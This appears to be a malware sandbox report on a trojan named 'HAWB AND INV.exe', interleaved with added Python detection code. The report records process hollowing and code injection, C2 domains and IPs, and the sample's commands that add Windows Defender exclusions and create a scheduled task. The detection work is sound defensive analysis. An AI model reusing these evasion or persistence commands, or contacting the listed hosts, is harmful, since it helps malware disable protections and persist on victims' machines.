          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9AE44 mov eax, dword ptr fs:[00000030h] 23_2_02B9AE44
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9AE44 mov eax, dword ptr fs:[00000030h] 23_2_02B9AE44
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h] 23_2_02B57794
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h] 23_2_02B57794
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h] 23_2_02B57794
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE8794 mov eax, dword ptr fs:[00000030h] 23_2_02AE8794
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B137F5 mov eax, dword ptr fs:[00000030h] 23_2_02B137F5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0E730 mov eax, dword ptr fs:[00000030h] 23_2_02B0E730
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h] 23_2_02AD4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h] 23_2_02AD4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h] 23_2_02B6FF10
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h] 23_2_02B6FF10
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h] 23_2_02BA070D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h] 23_2_02BA070D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFF716 mov eax, dword ptr fs:[00000030h] 23_2_02AFF716
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h] 23_2_02B0A70E
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h] 23_2_02B0A70E
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEFF60 mov eax, dword ptr fs:[00000030h] 23_2_02AEFF60
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA8F6A mov eax, dword ptr fs:[00000030h] 23_2_02BA8F6A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEEF40 mov eax, dword ptr fs:[00000030h] 23_2_02AEEF40
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE849B mov eax, dword ptr fs:[00000030h] 23_2_02AE849B
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B914FB mov eax, dword ptr fs:[00000030h] 23_2_02B914FB
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h] 23_2_02B56CF0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h] 23_2_02B56CF0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h] 23_2_02B56CF0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA8CD6 mov eax, dword ptr fs:[00000030h] 23_2_02BA8CD6
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0BC2C mov eax, dword ptr fs:[00000030h] 23_2_02B0BC2C
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h] 23_2_02BA740D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h] 23_2_02BA740D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h] 23_2_02BA740D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h] 23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF746D mov eax, dword ptr fs:[00000030h]23_2_02AF746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]23_2_02B6C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]23_2_02B6C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A44B mov eax, dword ptr fs:[00000030h]23_2_02B0A44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]23_2_02B01DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]23_2_02B01DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]23_2_02B01DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B035A1 mov eax, dword ptr fs:[00000030h]23_2_02B035A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]23_2_02BA05AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]23_2_02BA05AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]23_2_02B0FD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]23_2_02B0FD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B88DF1 mov eax, dword ptr fs:[00000030h]23_2_02B88DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]23_2_02AED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]23_2_02AED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]23_2_02B9FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]23_2_02B9FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]23_2_02B9FDE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (x3)
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.premier-moment.info
Source: C:\Windows\explorer.exe | Domain query: www.dinkoistmatrimony.com
Source: C:\Windows\explorer.exe | Domain query: www.vipbrandwatch.info
Source: C:\Windows\explorer.exe | Domain query: www.networkingmaderas.com
Source: C:\Windows\explorer.exe | Domain query: www.curvygirlholiday.com
Source: C:\Windows\explorer.exe | Domain query: www.ecosanhn.com
Source: C:\Windows\explorer.exe | Network Connect: 181.214.142.2 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 107.180.57.119 80
Source: C:\Windows\explorer.exe | Network Connect: 202.254.234.152 80
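The six domain queries and four outbound connections above are the C2 path as seen from the injected explorer.exe. As an added example (not part of the Joe Sandbox report), the Python below turns those rows into an IOC set and re-expresses the "System process connects to network" verdict as a rule that can be run over a host's own connection telemetry. The row text is copied from above; the extra ipconfig.exe -> 10.0.0.5 row, the SYSTEM_IMAGES set and all function names are the example's own assumptions.

```python
import ipaddress
import re

# Constructed sample input: the "Domain query" / "Network Connect" rows of the
# report section above, copied as text, plus one made-up row
# (ipconfig.exe -> 10.0.0.5) so the public-address filter has something to
# drop. Rows are accepted both with a " | " column separator and run together
# ("explorer.exeDomain query:"), as the flattened report renders them.
REPORT_ROWS = """\
Source: C:\\Windows\\explorer.exe | Domain query: www.premier-moment.info
Source: C:\\Windows\\explorer.exe | Domain query: www.dinkoistmatrimony.com
Source: C:\\Windows\\explorer.exe | Domain query: www.vipbrandwatch.info
Source: C:\\Windows\\explorer.exe | Domain query: www.networkingmaderas.com
Source: C:\\Windows\\explorer.exe | Domain query: www.curvygirlholiday.com
Source: C:\\Windows\\explorer.exeDomain query: www.ecosanhn.com
Source: C:\\Windows\\explorer.exe | Network Connect: 181.214.142.2 80
Source: C:\\Windows\\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\\Windows\\explorer.exe | Network Connect: 107.180.57.119 80
Source: C:\\Windows\\explorer.exeNetwork Connect: 202.254.234.152 80
Source: C:\\Windows\\SysWOW64\\ipconfig.exe | Network Connect: 10.0.0.5 80
"""

ROW_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)\s*\|?\s*"
    r"(?P<kind>Domain query|Network Connect):\s*(?P<value>\S+)(?:\s+(?P<port>\d+))?\s*$"
)

# Windows images that should not be opening their own HTTP connections. The two
# the sample injects into are listed; the set is an assumption to tune per site.
SYSTEM_IMAGES = {"explorer.exe", "ipconfig.exe"}


def parse_report_rows(text):
    """Parse the flattened rows into dicts; lines that are not rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["image"] = row["image"].rsplit("\\", 1)[-1].lower()  # basename only
        row["port"] = int(row["port"]) if row["port"] else None
        rows.append(row)
    return rows


def is_public_ip(ip):
    """Globally routable address? RFC 1918, loopback, link-local, multicast,
    reserved and unspecified ranges all answer False."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def extract_iocs(rows):
    """Distinct C2 candidates: queried domains and public addresses connected to."""
    domains = {r["value"].lower() for r in rows if r["kind"] == "Domain query"}
    ips = {r["value"] for r in rows
           if r["kind"] == "Network Connect" and is_public_ip(r["value"])}
    return {"domains": sorted(domains), "ips": sorted(ips, key=ipaddress.ip_address)}


def flag_system_process_egress(rows, system_images=SYSTEM_IMAGES):
    """The report's 'System process connects to network' verdict as a rule: a
    system image connecting to a public address is reported; private
    destinations (proxies, printers, file servers) are left alone."""
    return [
        {"image": r["image"], "dst": r["value"], "port": r["port"]}
        for r in rows
        if r["kind"] == "Network Connect"
        and r["image"] in system_images
        and is_public_ip(r["value"])
    ]


if __name__ == "__main__":
    rows = parse_report_rows(REPORT_ROWS)
    print(extract_iocs(rows))
    for hit in flag_system_process_egress(rows):
        print("system-process egress:", hit)
```

The rule fires four times here, all for explorer.exe on port 80, and stays quiet for the constructed private-address row. In production the same predicate belongs on Sysmon Event ID 3 or firewall logs keyed by originating image; explorer.exe does legitimately reach Microsoft endpoints at times, so pair it with the destination list rather than using it alone.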
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' (x2)
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write (x2)
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: AA0000
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Process created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
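The Add-MpPreference launches listed under "Adds a directory exclusion to Windows Defender" and the schtasks /Create /XML launch with its task definition staged under AppData\Local\Temp in the process list above are plain command lines that endpoint telemetry records. As an added example, not code from the report or from Joe Sandbox, the Python below evaluates two detection rules over constructed process-creation events in the shape of Sysmon Event ID 1: the report's three command lines plus two invented benign ones the rules must ignore. It generalises the exclusion rule to the other Add-MpPreference -Exclusion* parameters, not only -ExclusionPath as used here; the event field names, rule names, severities and the benign events are the example's assumptions.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process
# creation). The first three command lines are the ones the report shows; the
# last two are made-up benign invocations so the rules have something to ignore.
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\HAWB AND INV.exe"

EVENTS = [
    {"ParentImage": DROPPER, "Image": POWERSHELL,
     "CommandLine": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' "
                    r"Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'"},
    {"ParentImage": DROPPER, "Image": POWERSHELL,
     "CommandLine": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' "
                    r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'"},
    {"ParentImage": DROPPER, "Image": SCHTASKS,
     "CommandLine": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' "
                    r"/XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": SCHTASKS,  # constructed, benign
     "CommandLine": r"schtasks.exe /Create /TN 'Backup\Nightly' /XML 'C:\ProgramData\Backup\nightly.xml'"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,  # constructed, benign
     "CommandLine": r"powershell.exe Get-MpPreference"},
]

# Task XML staged in a per-user or system temp directory, as in the sample.
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def _value_after(flag_re, cmd):
    """Return the quoted or bare argument that follows a flag, or None."""
    m = re.search(flag_re + r"\s+(?:['\"](?P<q>[^'\"]+)['\"]|(?P<b>\S+))", cmd, re.IGNORECASE)
    if not m:
        return None
    return m.group("q") or m.group("b")


def detect_defender_exclusion(ev):
    """Add-MpPreference -Exclusion* from a PowerShell host: the sample whitelists
    its dropper and its persistence copy this way."""
    if basename(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    cmd = ev["CommandLine"]
    if not re.search(r"\bAdd-MpPreference\b", cmd, re.IGNORECASE):
        return None
    excluded = _value_after(r"-Exclusion(?:Path|Process|Extension|IpAddress)", cmd)
    if excluded is None:
        return None
    return {"rule": "defender_exclusion_added", "severity": "high", "excluded": excluded}


def detect_schtasks_temp_xml(ev):
    """schtasks /Create /XML <file under a Temp directory>: the task definition
    is staged as a temp file, the pattern the report's Sigma signature names."""
    if basename(ev["Image"]) != "schtasks.exe":
        return None
    cmd = ev["CommandLine"]
    if not re.search(r"/create\b", cmd, re.IGNORECASE):
        return None
    xml = _value_after(r"/xml", cmd)
    if xml is None or not TEMP_DIR_RE.search(xml):
        return None
    return {"rule": "scheduled_task_from_temp_xml", "severity": "medium",
            "task": _value_after(r"/tn", cmd), "xml": xml}


RULES = (detect_defender_exclusion, detect_schtasks_temp_xml)


def run_rules(events):
    """Evaluate every rule against every event. A parent under C:\\Users (the
    dropper on the Desktop here) is recorded because that is what separates
    these launches from an administrator doing the same thing from a console."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hit["image"] = basename(ev["Image"])
                hit["parent"] = ev["ParentImage"]
                hit["user_parent"] = bool(re.search(r"\\Users\\", ev["ParentImage"], re.IGNORECASE))
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in run_rules(EVENTS):
        print(hit)
```

Run as-is it reports three hits, each with user_parent set because the parent is the dropper under C:\Users; the two benign events produce nothing. On a host suspected of having run this sample, the exclusions themselves can be confirmed with (Get-MpPreference).ExclusionPath and in the Microsoft-Windows-Windows Defender/Operational log, where a configuration change is event 5007; the task lands under Task Scheduler Library\Updates.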
Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000002.593443753.00000000008B8000.00000004.00000020.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Users\user\Desktop\HAWB AND INV.exe VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\HAWB AND INV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
